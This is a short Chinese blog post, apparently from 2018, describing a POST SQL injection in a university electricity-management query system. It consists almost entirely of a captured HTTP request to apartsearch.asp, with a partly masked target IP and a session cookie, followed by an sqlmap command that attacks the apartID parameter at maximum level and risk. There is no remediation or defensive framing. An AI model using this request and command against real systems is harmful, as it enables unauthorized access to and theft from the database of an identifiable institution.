YH高校集中用电管理网上查询系统POST注入漏洞

1.burpsuite 抓包保存为1.txt

POST /apartsearch.asp HTTP/1.1
Host: 2*0.86.2**.69
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://2*0.86.2**.69/apartsearch.asp
Cookie: ASPSESSIONIDASRTDRTS=FHGPKHLDGKCGBHNDIAPLLDBH
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

apartID=1&action=search&Submit=%CC%E1%BD%BB

2.启动sqlmap

sqlmap.py -r "c:\1.txt" -p apartID --leve 5 --risk 3 --batch

 

posted @ 2018-06-14 11:49  左小龙  阅读(493)  评论(0编辑  收藏  举报